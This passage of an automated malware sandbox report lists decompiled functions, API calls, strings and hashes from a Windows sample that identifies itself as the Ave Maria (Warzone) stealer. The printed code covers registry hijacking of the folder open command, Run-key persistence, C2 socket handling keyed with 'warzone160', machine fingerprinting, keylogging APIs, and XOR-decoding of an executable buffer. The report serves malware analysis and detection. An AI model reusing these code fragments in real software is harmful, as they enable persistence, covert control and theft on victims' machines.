                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalInitializeLibraryLoadSectionlstrcmp
                                      • String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
                                      • API String ID: 4274177235-2474467583
                                      • Opcode ID: 22f50f49d8a58d5070d71bc3f60ee46eb92931e5b16a5226bb23ce7603d4210b
                                      • Instruction ID: 909a2bda9e7d76ee485c363074a3abfa7f95a6acdc533d047326d8401931f12c
                                      • Opcode Fuzzy Hash: 22f50f49d8a58d5070d71bc3f60ee46eb92931e5b16a5226bb23ce7603d4210b
                                      • Instruction Fuzzy Hash: B8014FB8A096204BE744FF26AD052193E91EB8AB187D1913FF00897364DB782842CB8D
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043F65C, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38registrystringUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 73%
                                      			E0043F65C(void* __ecx, char* _a4, CHAR* _a8) {
				void* _v8;
				long _t9;
				int _t12;
				int _t15;
				long _t16;

				_t15 = lstrlenA(_a8);
				_t9 = RegOpenKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0x20006,  &_v8);
				if(_t9 == 0) {
					_t16 = RegSetValueExA(_v8, _a4, 0, 1, _a8, _t15);
					RegCloseKey(_v8);
					if(_t16 == 0) {
						_t12 = 1;
					} else {
						_push(_t16);
						goto L2;
					}
				} else {
					_push(_t9);
					L2:
					SetLastError();
					_t12 = 0;
				}
				return _t12;
			}








                                      0x0043f66a
                                      0x0043f681
                                      0x0043f689
                                      0x0043f6ad
                                      0x0043f6af
                                      0x0043f6b7
                                      0x0043f6bc
                                      0x0043f6b9
                                      0x0043f6b9
                                      0x00000000
                                      0x0043f6b9
                                      0x0043f68b
                                      0x0043f68b
                                      0x0043f68c
                                      0x0043f68c
                                      0x0043f692
                                      0x0043f692
                                      0x0043f6c0

                                      APIs
                                      • lstrlenA.KERNEL32(0043F938,00444713,?,?,0043F938,00444713,?), ref: 0043F664
                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?,?,?,0043F938,00444713,?), ref: 0043F681
                                      • SetLastError.KERNEL32(00000000,?,?,0043F938,00444713,?), ref: 0043F68C
                                      • RegSetValueExA.ADVAPI32(?,00444713,00000000,00000001,0043F938,00000000,?,?,0043F938,00444713,?), ref: 0043F6A4
                                      • RegCloseKey.ADVAPI32(?,?,?,0043F938,00444713,?), ref: 0043F6AF
                                      Strings
                                      • Software\Classes\Folder\shell\open\command, xrefs: 0043F677
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseErrorLastOpenValuelstrlen
                                      • String ID: Software\Classes\Folder\shell\open\command
                                      • API String ID: 1613093083-2536721355
                                      • Opcode ID: 767bbaa3f1aad34e9d7f92d405bf4cec0bcb1f28ba7cac136047ad57135dea49
                                      • Instruction ID: bf3edbdafc2ed9b901726211592195ebb011ae88cac686587b26bdaa80c411bb
                                      • Opcode Fuzzy Hash: 767bbaa3f1aad34e9d7f92d405bf4cec0bcb1f28ba7cac136047ad57135dea49
                                      • Instruction Fuzzy Hash: D3F09639940214BBDF211F909D0AFDF3BA9EF09751F510061BE05B6160D6B58E05E69C
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00CC85BD, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID: *?$.
                                      • API String ID: 269201875-3972193922
                                      • Opcode ID: 176ca1dfeeaba7049e50e9e5823c34ed6f47d4fca2541c5520a5665a2d5b650c
                                      • Instruction ID: 5cab7db6fbb0ece13e0c75d904e2c3d9b8d010838bb47524a1dbec25b4223004
                                      • Opcode Fuzzy Hash: 176ca1dfeeaba7049e50e9e5823c34ed6f47d4fca2541c5520a5665a2d5b650c
                                      • Instruction Fuzzy Hash: 6B613B76D002099FDF14CFA9C981AEEFBF5EF48310B24416EE855E7300EA31AE459B90
                                      Uniqueness

                                      Uniqueness Score: 0.75%

                                      Function 004351E4, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145networkUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 79%
                                      			E004351E4(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				char _v56;
				char _v60;
				char _v65600;
				void* _t45;
				char* _t52;
				intOrPtr _t77;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t108;
				char* _t109;
				void* _t112;
				void* _t113;
				void* _t114;

				_t108 = __edx;
				_t85 = __ecx;
				_t45 = E00431130(0x10040, __ecx);
				_t84 = _t85;
				if( *((intOrPtr*)(_t84 + 0xc)) != 0xffffffff) {
					_v28 = 0xea60;
					__imp__#21( *((intOrPtr*)(_t84 + 0xc)), 0xffff, 0x1006,  &_v28, 4);
					E00431052( &_v65600, 0, 0xffff);
					_t114 = _t113 + 0xc;
					_v60 = 0;
					_v56 = 0;
					E00432E33( &_v44, _t108, E004331EC( &_v12, "warzone160"));
					E00435A2D(_v12);
					_v16 = 0;
					_v12 = 0;
					do {
						_t52 =  &_v65600;
						__imp__#16( *((intOrPtr*)(_t84 + 0xc)), _t52, 0xc, 0);
						_t109 = _t52;
						if(_t109 != 0xc) {
							if(_t109 == 0xffffffff) {
								break;
							}
							goto L8;
						}
						_v24 = 0;
						_t102 =  &_v24;
						_v20 = 0;
						E00432DC1( &_v24,  &_v65600, _t52);
						_t103 = _t114;
						E00432E79(_t114,  &_v24);
						E00432E79(_t114,  &_v44);
						E00435C32( &_v52, _t108, _t114, _t103,  &_v24, _t102);
						_t114 = _t114 + 0x10;
						_t77 =  *((intOrPtr*)(_v52 + 4));
						_t112 = _t77 + 0xc;
						if(_t77 == 0 || _t112 == _t109) {
							L6:
							E00432E66( &_v52);
							E00432E66( &_v24);
						} else {
							do {
								_t83 =  &_v65600 + _t109;
								__imp__#16( *((intOrPtr*)(_t84 + 0xc)), _t83, _t112 - _t109, 0);
								_t109 = _t109 + _t83;
							} while (_t112 != _t109);
							goto L6;
						}
						L8:
						_t92 =  &_v16;
						E00432DC1( &_v16,  &_v65600, _t109);
						_t93 = _t114;
						E00432E79(_t114,  &_v16);
						E00432E79(_t114,  &_v44);
						E00435C32( &_v36, _t108, _t114, _t93,  &_v16, _t92);
						_t114 = _t114 + 0x10;
						E00432DF3(_t84 + 0x10);
						E00432DC1(_t84 + 0x10, _v36, _t109);
						E00432DF3( &_v16);
						E00432DF3( &_v36);
						E00434B8D(_t84, _t108, _a4);
						E00432E66( &_v36);
						_push(0);
						_pop(0);
					} while (_t109 > 0);
					E00432E66( &_v16);
					E00432E66( &_v44);
					return E00432E66( &_v60);
				}
				return _t45;
			}

























                                      0x004351e4
                                      0x004351e4
                                      0x004351ec
                                      0x004351f2
                                      0x004351fa
                                      0x00435205
                                      0x0043521b
                                      0x0043522c
                                      0x00435231
                                      0x00435234
                                      0x0043523a
                                      0x0043524b
                                      0x00435253
                                      0x00435258
                                      0x0043525b
                                      0x0043525e
                                      0x00435261
                                      0x0043526b
                                      0x00435271
                                      0x00435276
                                      0x004352f8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004352f8
                                      0x0043527f
                                      0x00435283
                                      0x00435286
                                      0x00435289
                                      0x00435293
                                      0x00435296
                                      0x004352a3
                                      0x004352ab
                                      0x004352b3
                                      0x004352b6
                                      0x004352b9
                                      0x004352be
                                      0x004352e3
                                      0x004352e6
                                      0x004352ee
                                      0x004352c4
                                      0x004352c4
                                      0x004352d1
                                      0x004352d7
                                      0x004352dd
                                      0x004352df
                                      0x00000000
                                      0x004352c4
                                      0x004352fa
                                      0x00435302
                                      0x00435305
                                      0x0043530f
                                      0x00435312
                                      0x0043531f
                                      0x00435327
                                      0x0043532c
                                      0x00435332
                                      0x0043533e
                                      0x00435346
                                      0x0043534e
                                      0x00435358
                                      0x00435360
                                      0x00435365
                                      0x00435367
                                      0x00435368
                                      0x00435373
                                      0x0043537b
                                      0x00000000
                                      0x00435383
                                      0x0043538c

                                      APIs
                                      • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 0043521B
                                        • Part of subcall function 004331EC: lstrlenA.KERNEL32(?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 004331F5
                                        • Part of subcall function 004331EC: lstrlenA.KERNEL32(?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 00433202
                                        • Part of subcall function 004331EC: lstrcpyA.KERNEL32(00000000,?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 00433215
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      • recv.WS2_32(000000FF,?,0000000C,00000000), ref: 0043526B
                                      • recv.WS2_32(000000FF,?,000000FF,00000000), ref: 004352D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlenrecv$FreeVirtuallstrcpysetsockopt
                                      • String ID: `$warzone160
                                      • API String ID: 3973575906-811885577
                                      • Opcode ID: df808bec8a93ef67bf8a401f68e4c53648070a6fa6137b6948341dadcd5e3bae
                                      • Instruction ID: 5e971ac5538c6efe250bd282757d136405ed309f6beaa4abaf614bb68cb9bfe5
                                      • Opcode Fuzzy Hash: df808bec8a93ef67bf8a401f68e4c53648070a6fa6137b6948341dadcd5e3bae
                                      • Instruction Fuzzy Hash: 7C419371900118ABCF15EF65DC86DEFBB38FF58354F00116EF815A6191DB785A44CBA8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043DC53, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 65registryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 32%
                                      			E0043DC53(intOrPtr* __ecx, void* __edx) {
				void* _v8;
				char _v12;
				char _v16;
				int _v20;
				char _v24;
				int* _t18;
				void* _t48;
				int* _t50;
				intOrPtr _t53;

				_t48 = __edx;
				_t35 = __ecx;
				_t50 = __ecx;
				_v8 = 0;
				_v24 = 0;
				_v20 = 0;
				 *((intOrPtr*)(__ecx)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_t53 =  *0x447d48; // 0x0
				if(_t53 != 0) {
					_t18 = 0x447d44;
				} else {
					RegOpenKeyExW(0x80000002,  *(E00433412( &_v12, L"SOFTWARE\\Microsoft\\Cryptography")), 0, 0x101,  &_v8);
					asm("sbb esi, esi");
					E00435A2D(_v12);
					if(1 != 0) {
						E0043EF61( &_v8, _t48, E00433412( &_v12, L"MachineGuid"),  &_v24);
						E00435A2D(_v12);
						E0043EF4C( &_v8);
					}
					E00432CCC(_t50, E00435C02( &_v16,  &_v24));
					E00432E66( &_v16);
					_t35 = 0x447d44;
					_t18 = _t50;
				}
				E00432CCC(_t35, _t18);
				E00432E66( &_v24);
				E0043EF4C( &_v8);
				return _t50;
			}












                                      0x0043dc53
                                      0x0043dc53
                                      0x0043dc5d
                                      0x0043dc5f
                                      0x0043dc62
                                      0x0043dc65
                                      0x0043dc68
                                      0x0043dc6a
                                      0x0043dc6d
                                      0x0043dc73
                                      0x0043dcfc
                                      0x0043dc79
                                      0x0043dc97
                                      0x0043dca2
                                      0x0043dca4
                                      0x0043dcac
                                      0x0043dcc3
                                      0x0043dccb
                                      0x0043dcd3
                                      0x0043dcd3
                                      0x0043dce6
                                      0x0043dcee
                                      0x0043dcf3
                                      0x0043dcf8
                                      0x0043dcf8
                                      0x0043dd02
                                      0x0043dd0a
                                      0x0043dd12
                                      0x0043dd1c

                                      APIs
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                      • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0043DC97
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 0043EF61: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00000000,?,?,?,?,0043F3B9,?,0000000A,80000001), ref: 0043EF84
                                        • Part of subcall function 0043EF61: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000,?,0043F3B9,?,0000000A,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0043EFA7
                                        • Part of subcall function 0043EF4C: RegCloseKey.ADVAPI32(?,?,0043F043,?,0043F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0043EF56
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                      • String ID: D}D$D}D$MachineGuid$SOFTWARE\Microsoft\Cryptography
                                      • API String ID: 1903904756-2861317292
                                      • Opcode ID: bcf930d156b3afa4211f9002da33c01f5b155b8b30ab5d71786524c6baa64898
                                      • Instruction ID: 9de9f946743afac7dfa8560b4950666b9f72cfd2a31f4cc3f8d014c0133e3479
                                      • Opcode Fuzzy Hash: bcf930d156b3afa4211f9002da33c01f5b155b8b30ab5d71786524c6baa64898
                                      • Instruction Fuzzy Hash: 76117270E10115ABCB04FB95D9538EDB778AF58704F50216FB401A3191DBB81F06DB98
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043EAC8, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 61windowUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 74%
                                      			E0043EAC8(void* __ecx, void* __eflags) {
				void* _v8;
				char _v12;
				char _v16;
				intOrPtr _v40;
				char _v44;
				void* _t15;
				intOrPtr* _t16;
				intOrPtr _t34;
				void* _t45;

				_t45 = __eflags;
				_t15 = E0043E8EC();
				_push(__ecx);
				_t16 = E0043E907(_t15, "VirtualQuery", _t45);
				if(_t16 != 0) {
					_t16 =  *_t16(E0043EAC8,  &_v44, 0x1c);
					_t34 = _v40;
					_t47 = _t34;
					if(_t34 != 0) {
						E0043E762(_t34, _t47);
						MessageBoxA(0, "Bla2", "Bla2", 0);
						_push(_t34);
						_v12 = 0;
						E0043EB77( &_v16, _t47, E00433412( &_v8, L"Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper"),  &_v12);
						E00435A2D(_v8);
						_v8 = 0;
						E00435A2D(0);
						_push(0);
						_v12 = 0;
						E0043EB77( &_v16, _t47, E00433412( &_v8, L"C:\\Users\\Vitali Kremez\\Documents\\MidgetPorn\\workspace\\MsgBox.exe"),  &_v12);
						E00435A2D(_v8);
						_v8 = 0;
						return E00435A2D(0);
					}
				}
				return _t16;
			}












                                      0x0043eac8
                                      0x0043eacf
                                      0x0043ead4
                                      0x0043eadc
                                      0x0043eae4
                                      0x0043eaf5
                                      0x0043eaf7
                                      0x0043eafa
                                      0x0043eafc
                                      0x0043eafe
                                      0x0043eb0e
                                      0x0043eb14
                                      0x0043eb18
                                      0x0043eb2d
                                      0x0043eb35
                                      0x0043eb3c
                                      0x0043eb3f
                                      0x0043eb44
                                      0x0043eb48
                                      0x0043eb5d
                                      0x0043eb65
                                      0x0043eb6c
                                      0x00000000
                                      0x0043eb6f
                                      0x0043eafc
                                      0x0043eb76

                                      APIs
                                        • Part of subcall function 0043E907: lstrcmpA.KERNEL32(?,0043F9CB,?,open,0043F9CB), ref: 0043E940
                                      • MessageBoxA.USER32(00000000,Bla2,Bla2,00000000), ref: 0043EB0E
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 0043EB77: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0043EBB2
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Strings
                                      • C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe, xrefs: 0043EB4C
                                      • Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper, xrefs: 0043EB1C
                                      • VirtualQuery, xrefs: 0043EAD5
                                      • Bla2, xrefs: 0043EB05, 0043EB0B, 0043EB0C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$CreateFreeMessageProcessVirtuallstrcmplstrcpy
                                      • String ID: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper$Bla2$C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe$VirtualQuery
                                      • API String ID: 1196126833-2308542105
                                      • Opcode ID: 72123dd4687308d070e2e7bf4641e7f4e15c66a12bba7ca4e9e39af705c911ee
                                      • Instruction ID: b1daaa142c3d637e31fe05b685505fbf190ea1d8cae03a4a187c38a913556e23
                                      • Opcode Fuzzy Hash: 72123dd4687308d070e2e7bf4641e7f4e15c66a12bba7ca4e9e39af705c911ee
                                      • Instruction Fuzzy Hash: D11154B0A01514BA9B09FBA2DD52DEFBB78DF48714F10515FF402A2582DB785F01D668
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043F73D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55memorystringUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 73%
                                      			E0043F73D(void* __ecx) {
				long _v8;
				void* _t7;
				void* _t17;
				void* _t24;
				void* _t26;
				WCHAR* _t31;

				_push(__ecx);
				_t17 = __ecx;
				_t26 = E004310AD(0x800);
				_t24 = _t26;
				_t7 = 0x601;
				do {
					 *_t24 =  *(0x443c00 + _t24) ^ 0x00000045;
					_t24 = _t24 + 1;
					_t7 = _t7 - 1;
				} while (_t7 != 0);
				VirtualProtect(_t26, 0x7d0, 0x40,  &_v8);
				_t31 = VirtualAlloc(0, 0x1fe, 0x1000, 0x40);
				GetWindowsDirectoryW(_t31, 0x104);
				E0043102C( &(_t31[lstrlenW(_t31)]), L"\\System32\\cmd.exe", 0x28);
				_t5 = _t26 + 0xef; // 0xef
				return  *_t5(_t31, _t17, 0, 0);
			}









                                      0x0043f740
                                      0x0043f749
                                      0x0043f750
                                      0x0043f758
                                      0x0043f75c
                                      0x0043f761
                                      0x0043f767
                                      0x0043f769
                                      0x0043f76a
                                      0x0043f76a
                                      0x0043f77b
                                      0x0043f795
                                      0x0043f79d
                                      0x0043f7b5
                                      0x0043f7bd
                                      0x0043f7cf

                                      APIs
                                        • Part of subcall function 004310AD: GetProcessHeap.KERNEL32(00000000,00000000,0043F750,00000800,00000000,00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000), ref: 004310B3
                                        • Part of subcall function 004310AD: HeapAlloc.KERNEL32(00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000,?,?,?,00000000), ref: 004310BA
                                      • VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000), ref: 0043F77B
                                      • VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000), ref: 0043F78F
                                      • GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000,?,?,?), ref: 0043F79D
                                      • lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000), ref: 0043F7AB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocHeapVirtual$DirectoryProcessProtectWindowslstrlen
                                      • String ID: \System32\cmd.exe
                                      • API String ID: 34486464-2003734499
                                      • Opcode ID: 6f8c10615cea8372353da799e800fe0d5277d7049a1a4f1e3c701de6aad0ba7c
                                      • Instruction ID: fcf847484ee5e2128083330ad0e2d950715bfcee335a2577b96b47eed4ce21ca
                                      • Opcode Fuzzy Hash: 6f8c10615cea8372353da799e800fe0d5277d7049a1a4f1e3c701de6aad0ba7c
                                      • Instruction Fuzzy Hash: 330147717403517BF22057759D0AFAB3BACDBCAB11F500025F704EA1C0CAE9A801839C
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043FC79, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 87%
                                      			E0043FC79(CHAR* __ecx, long* __edx) {
				long _v8;
				long _t6;
				void* _t11;
				long* _t18;
				void* _t22;

				_push(__ecx);
				_t18 = __edx;
				_t11 = E004310AD("C:\ProgramData\images.exe");
				_v8 = 0;
				_t22 = CreateFileA(__ecx, 0x80000000, 0, 0, 3, 0x80, 0);
				_t6 = GetFileSize(_t22, 0);
				 *_t18 = _t6;
				ReadFile(_t22, _t11, _t6,  &_v8, 0);
				CloseHandle(_t22);
				return _t11;
			}








                                      0x0043fc7c
                                      0x0043fc85
                                      0x0043fc8f
                                      0x0043fca3
                                      0x0043fcac
                                      0x0043fcb1
                                      0x0043fcbc
                                      0x0043fcc2
                                      0x0043fcc9
                                      0x0043fcd5

                                      APIs
                                        • Part of subcall function 004310AD: GetProcessHeap.KERNEL32(00000000,00000000,0043F750,00000800,00000000,00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000), ref: 004310B3
                                        • Part of subcall function 004310AD: HeapAlloc.KERNEL32(00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000,?,?,?,00000000), ref: 004310BA
                                      • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0043FCA6
                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,?,?,00432B6F), ref: 0043FCB1
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0043FCC2
                                      • CloseHandle.KERNEL32(00000000), ref: 0043FCC9
                                      Strings
                                      • C:\ProgramData\images.exe, xrefs: 0043FC80
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Heap$AllocCloseCreateHandleProcessReadSize
                                      • String ID: C:\ProgramData\images.exe
                                      • API String ID: 1280141731-922034686
                                      • Opcode ID: 2e013649406f67e3ad7c3c546687d2b1ec1736450b78cd5571415516e6ae9d95
                                      • Instruction ID: 821c81e0de00d1dc503ea2556b79e8d2d8b2eba6ba1262382b6cb05c66f4dc07
                                      • Opcode Fuzzy Hash: 2e013649406f67e3ad7c3c546687d2b1ec1736450b78cd5571415516e6ae9d95
                                      • Instruction Fuzzy Hash: 4CF082B6611210BFF3245B65AD09FBB36ECEB4A714F500076FA01E3180EAF45E0187B8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00CC5312, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderUNIQUELIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CC52C3,?,?,00CC528B,?,00000000), ref: 00CC5332
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,00CC52C3,?,?,00CC528B,?,00000000), ref: 00CC5345
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00CC52C3,?,?,00CC528B,?,00000000), ref: 00CC5368
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
